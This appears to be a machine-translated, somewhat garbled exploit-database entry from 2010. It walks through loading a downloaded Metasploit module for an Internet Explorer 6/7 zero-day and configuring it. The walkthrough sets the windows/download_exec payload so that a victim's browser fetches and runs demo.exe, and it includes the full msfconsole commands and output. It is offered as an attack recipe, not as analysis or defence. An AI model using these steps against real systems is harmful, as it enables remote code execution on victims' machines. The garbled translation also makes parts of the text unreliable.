The latest IE 0day vulnerability Metasploit to generate method-vulnerability warning-the black bar safety net

2010-05-03T00:00:00
ID MYHACK58:62201026836
Type myhack58
Reporter 佚名
Modified 2010-05-03T00:00:00

Description

A, Download http://www. rec-sec. com/exploits/msf/ie_iepeers_pointer. rb Second, placed to C:\Metasploit\Framework3\msf3\modules\exploits\test. A change of name ie. rb Third, start msfconsole Fourth, the msf > use exploit/test/ie

msf exploit(ie) > show optinos

Echo: the

Module options:

Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8 0 8 0 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random)

Exploit target:

Id Name \ -- ---- 0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) > set srvhost 192.168.0.3 srvhost => 192.168.0.3 msf exploit(ie) > set srvport 8 0 8 0 srvport => 8 0 8 0

msf exploit(ie) > set payload windows/download_exec payload => windows/download_exec

msf exploit(ie) > set url http://192.168.0.3/demo.exe url => http://192.168.0.3/demo.exe msf exploit(ie) > exploit [*] Exploit running as background job.

msf exploit(ie) > [] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY [] Server started.

Then open http://192.168.0.3:8 0 8 0/4rJ0JRSnX55wAY, you can see the source.